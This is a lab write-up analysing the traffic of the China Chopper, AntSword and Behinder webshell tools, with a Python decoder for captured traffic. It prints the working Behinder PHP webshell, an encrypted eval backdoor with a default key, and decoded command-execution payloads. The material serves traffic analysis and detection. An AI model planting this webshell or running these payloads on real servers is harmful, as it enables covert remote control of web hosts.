1. China Chopper (菜刀) traffic analysis
Environment: Windows 10, China Chopper, Kali, Apache2 service
systemctl restart apache2.service   # start the Apache2 service
cd /var/www/html
vim shell.php
service --status-all | grep apache2   # check whether Apache is running
Open the 1.php file from the Win10 machine.
First connect to the target environment with China Chopper, then open Wireshark and filter on HTTP packets; open the virtual terminal in China Chopper and enter the following command.
Back in Wireshark, follow the HTTP stream of the target machine.
Decode it with base64.
After decoding:
@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};
echo("X@Y");   // marker that delimits the command output in the response
$m=get_magic_quotes_gpc();
$p='/bin/sh';
$s='cd /var/www/html/;netstat -an | grep ESTABLISHED;echo [S];pwd;echo [E]';   // the command typed in the virtual terminal
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";   // -c for /bin/sh on Linux, /c for cmd.exe on Windows
$r="{$p} {$c}";
$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));
$fp=proc_open($r." 2>&1",$array,$pipes);   // run the shell and capture stdout and stderr
$ret=stream_get_contents($pipes[1]);
proc_close($fp);
print $ret;;
echo("X@Y");
die();
Note: because the PHP version is too high, dynamic calls to some functions are forbidden in PHP 7 (for example, calling them through array_map throws an error), so China Chopper's configuration file has to be located and modified.
2. AntSword (蚁剑) traffic analysis
Same target environment as for China Chopper.
Visit http://192.168.188.177/shell.php; it returns no error, so open AntSword and connect.
As before, capture the HTTP packets with Wireshark, run any one command in the virtual terminal, then analyze the captured HTTP packets.
AntSword uses URL decoding by default; other encoders can also be configured.
3. Behinder (冰蝎) traffic analysis
Behinder uses the encryption functions of the server-side scripting language: during communication the message body is AES-encrypted, so security products that rely on signature matching cannot detect it. The precondition for connecting is uploading the webshell bundled with Behinder (found in Behinder's server directory):
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // the key is the first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    // no OpenSSL extension: base64-decode the body, then XOR every byte with the key
    $t="base64_"."decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    // OpenSSL available: the body is AES-128 encrypted, base64 on the wire
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);   // the plaintext has the form "func|params"
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);   // params are executed as PHP code
?>
The target environment is the same as above; a shell1.php file is created in the web root and opened at that path in the browser.
Open Wireshark to capture packets, connect with Behinder, and type a few commands in the virtual terminal to generate HTTP exchanges.
After decoding we find assert | followed by base64_decode; that is, the content after the | separator has to be base64-decoded once more.
After decoding:
@error_reporting(0);
function main($content)
{
    // command output goes back as JSON with base64-encoded fields, encrypted with the session key
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
}
function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
    {
        // XOR fallback, mirror of the decoding loop in the webshell; note there is no base64 layer here
        for($i=0;$i<strlen($data);$i++) {
            $data[$i] = $data[$i]^$key[$i+1&15];
        }
        return $data;
    }
    else
    {
        return openssl_encrypt($data, "AES128", $key);
    }
}
}$content="eURHZnpzQ3d1WHpXOVZLWDVCeWpkZHBBSzd1S0JiTEhwNXZoNDVIR0NKTHROWVZ3M1lGQTFKam03SGhhQ0NkUkZuUlhJbFNOVENkMGtwUUplVXF3WUVzaE1ROEpMeFlNQTQxN2JBVms2WUlWdUh0d0pOVXY0NTBzWWcwaUo3RjNoYXhuZ29pYlNYelRxR3lWVE9mQU9JYTRCaHBwVVZ0b2lDSlNISkFEV3g5QWpES3J2dGRqUzJaejhRM3hQM0tGbXJ6eWVOdUJ0ZU5TdnJSMFlDOXVFR09JeFJXOUtKRVJ2ZEl4aEQzVGNsMndmdFNVWGJENWNWM3NCUDVaSWhRUXVVTE96VDVBSWFmV3h3UlRqU2VqTTZRQngxUkpGQ3pxR0dVZkxTNmptZHZHMU9WSThwMGFrYk5tZ01Zc1NkUlpVdGpNRlRhMXlEWWZad0xFTG9sSThsTEd6dFFwSVV4bzJPc1REWW5lclJyNTNETGlLbXNNQXhCc1JxVzV2RjJ3eXpVdElNdjM3OW1lZHU0RWs3MmE0ZTBDRklnWFBhSWlIcTJPRlNOempvZmVIb3lqclZKcTQ3eFNHTFU0UWdMU0lOc1NRamo2alk3dUwxVVMySEpZaVVlb0ZOSTFnV2FIeGpSWTJBa0l1TFJVTlVjQnh1aDdSY1J0M3E2S1VTR0dJRTl5NkM5dW5jbGExQ1VqbDJiNFhlR05acE9UbFlkWE1WeWd3bThvUkRmNXZhZWw0NjczOVp5eXFrWFA1ZDhmTUJqeFB5Mkk2bjRCNTUxVnI4ZWtkNDB6RDE1bXF0UG5mUG1aVk5IMlV0QzZmdk91SmJwblVGZDV5SWVab1RDcnJrNnlpT1JLNjBMNzRsSXh0OUkyU1ZickV2Z1U0U3BzTE1ORFhvdWkzVnVpMjM0cW83RnZGSFlHTDNjeFFLVW5ScVJ3eVo0UTJHcTdjQm9rMVlCSGI0TUtzUUhYdHFMQkFNcDk0bURJb2dEdlVqSFFOa1pqQW45TFpDdnlQNzBZRzJjN0RSQThMYkpvUHZkOVl6RDNjQmxXM2hkS2x1cjNxR0UwVHk4UGxycDhQYUgxdWtSUEhIeERwN1YzZkl5ZFZaNU9NOVU2WjBsTjJDU3RzMVA5OVhiS0lvMTNEUzhLc0JpVXdKU3I3WGhzQ1l3OFN5RWF5c3NwSnFrSGh4dFZlNGRZOW13Rk8yRjVXdFFvZXp6NjR4cGJ0SVd3WGxzV0NhVnduYm1ZSWh6VWwyaTBGRzB2Vm9JcEhXa21YM1VRbERJbUpRRjcwd09VOGlQU2oxTEFOR1U0R0NRUFR1MUFtb0NBZmR1dFdyRlZDOXdWSDAweFkyNEdQVEdmRlA5SFFpVUxraTZCWGZGYzV1c21xbWkwN1Y4T1Y0enlQVHhtdGoxZ2l1cnIwVjVUQkVFV0JwRWJ3ZUlWYlg4ajEwaVQ5OHoxMGZoUXczbktpNWlBdHhFRGNnemhSOUgwUXB2STF3RXlVMGE5THdoalp5dWE5WTJpdm9mcEdhS3RPeEFZRlBsNUg4V090cjRhcERLdnVHM2dpNFBVTXJXbFFPTGRSZW9jOElIYWJZZWk4UmJ3REcyVVZKQXdBOFZJeWZ4VHBrZnliYXc2TUdCTnYyUkpqcXhJQ1NPbzRTdTFoQ0Y4aWxiUVBuNjZNbUNnS2dYR3JzVXZOV3daM2lvVVhtVDNzQkZnWFk5N3pRWmJQNE5Xc3dwM0NFaTlXRVNwemJkbERVNTRQaXBHRVlZMHhjVzM3bkpJeFE5ZmVLSzhHYjNMa0t2bVA0UlRXc0FBQUxSTFpEWE1nN3NtSXpVSmdaRnJFTUdneFYyUkVtcUxwTDZzbzNmYnJDTlJwV01qRDlKZVNhdGxwT1pQdTFSTmtjQVBWQ3ZhVUkwZTBEV2Q1czYzSkVqZHkzOHl6THFJdmpGREd6NEl6MjZ0bVpKUDhXTGFRZVJ5M3BKU3Q2cXAyRWlYS05ya
jRha21nRGRzQXVHcXU1OGhJSHJhMENBUVY2SGZIa094TVZpTWRWUkR4NWprRzdvV1l0YlpYcTFYNU5HU2FwTk1IWVp0SWtMN0pQRm1GM1RCcGNuTjBtb0ZvNFRUcWtPWVVnWTNpd3R5OHpiUnhJZk53QW5IcHgwQVBhVE9hUFVjeE1ybmtFb09SZzRpaHJvT1ZoZ2t0R25HaTV0S2RHV3F4MEVvazFRTjlUdTFmNUNhVDFQWWxjNFVaOHVJbW1vdFVWWTViY0tlVWhqek1nVEdpS1Nha0MzQzR1TjVpaENuR3VlUlJuSEdiZndmYU5pYVliMHB6R2EyNE02cHNNbEV0Q1lvMDVYQzBSaWRXeVJnajBlTmZmNGx6dEllaFNiSU5ZV3MzeU9JRllOZXlac0R0S3FGNUZCMUlnM2U2UU8xRVZqdTRVcWpWSEF6cTA0ZEdvQk92RWlJU2dxR2tmc3ljdWdodmpLVU9uekJSaTFhZWhKWVkwd2tYaGVRUGZsOE5sZ1lkMXZQanBXRTNyUG56OE1pNElBT24yQkkwTkZUQlZEb0IxYmNFemx2RzVPYVZsMjdNNnpQYVltN3JEZXYycjlWNjFhTEZjOGhkWXNwaVZGa2NOb3E0eHpNWjVtUU1keW9KTDRnbVBSR3I4bnNRbEZ4VmNSRnZTcEV5OHJjYk1Xd1RENHFaSFNQaVc2M3RTWnpKV1NPVko3RHQwUjBOOU5EaFBqRFVUNXhZa0pQNzk0SkJrM1B5Y2E4aktpMFVibUU1Q3pvbjZZMnlBUXQ1Y3F0ajJrdlF1WG1qMU41alZsd2hnS1hQV0dWQ09FMVh3VlN5VEx6Z213ZnRwV3Q4NFBUbzNGbTRvNzNxeUZ4WUxPdWhKd0tCVzlZM3lUR1duVjRTVFpraGpBdW5jWlJwZHlPem9xcDFVOEFLWHZES2V0QWpZOHJBOGlaRk1uUktrQ3Y3UEZLN1k4UW5JYkFnZTlIdWc4bHZTWlpuOWVNMlNFV1FpWjM5Z3BhY0I5dnVLOHd6UzNvYjdaZFhSWVZFQ1VDZE1oQVlDcVJMb2RXUUgzb0xnMFpp";$content=base64_decode($content);
main($content);
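A decoder for Behinder's request and response bodies, added as an example (not part of the original notes or of Behinder). It derives the key from the connection password, undoes the XOR path exactly as the webshell and the encrypt() function above apply it (base64 then XOR for requests, XOR only for responses), and decrypts the OpenSSL path, which openssl_decrypt($post,"AES128",$key) makes AES-128-CBC with a zero IV and PKCS#7 padding. The sample traffic is constructed; the AES function assumes the third-party cryptography package is installed.

```python
import base64
import hashlib
import json


def derive_key(password: str) -> bytes:
    """Behinder key: first 16 hex characters of md5(password), used as ASCII bytes."""
    return hashlib.md5(password.encode()).hexdigest()[:16].encode()


def xor_layer(data: bytes, key: bytes) -> bytes:
    """The non-OpenSSL branch: byte i is XORed with key[(i+1) & 15]; same operation both ways."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def decode_request_xor(body: str, key: bytes) -> tuple:
    """Request on the XOR path: base64, then XOR; the plaintext has the form 'func|params'."""
    plain = xor_layer(base64.b64decode(body), key).decode("utf-8", "replace")
    func, _, params = plain.partition("|")
    return func, params


def decode_response_xor(body: bytes, key: bytes) -> dict:
    """Response on the XOR path is XORed JSON with no base64 wrapper; its fields are base64."""
    result = json.loads(xor_layer(body, key))
    return {k: base64.b64decode(v).decode("utf-8", "replace") for k, v in result.items()}


def decode_request_aes(body: str, key: bytes) -> tuple:
    """OpenSSL branch: AES-128-CBC, IV omitted so PHP pads it to 16 NUL bytes, PKCS#7 padding,
    base64 transport encoding. Imports the 'cryptography' package lazily (assumed installed)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(b"\0" * 16)).decryptor()
    padded = dec.update(base64.b64decode(body)) + dec.finalize()
    plain = padded[: -padded[-1]].decode("utf-8", "replace")
    func, _, params = plain.partition("|")
    return func, params


KEY = derive_key("rebeyond")  # expected to match the key hard-coded in the webshell above

# Constructed sample exchange on the XOR path, built with the same operations the webshell uses.
SAMPLE_PARAMS = 'echo("id");'  # stand-in for the PHP the client sends after "assert|"
SAMPLE_REQUEST = base64.b64encode(xor_layer(("assert|" + SAMPLE_PARAMS).encode(), KEY)).decode()
SAMPLE_RESPONSE = xor_layer(json.dumps({
    "status": base64.b64encode(b"success").decode(),
    "msg": base64.b64encode(b"uid=33(www-data)").decode(),
}, separators=(",", ":")).encode(), KEY)
```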